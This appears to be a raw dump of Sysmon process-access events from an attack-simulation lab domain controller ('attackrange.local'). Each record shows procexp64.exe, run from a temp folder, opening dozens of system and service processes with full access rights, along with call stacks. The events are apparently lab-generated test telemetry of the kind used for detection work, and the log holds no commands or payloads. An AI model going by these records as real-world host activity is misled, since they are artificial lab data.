15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 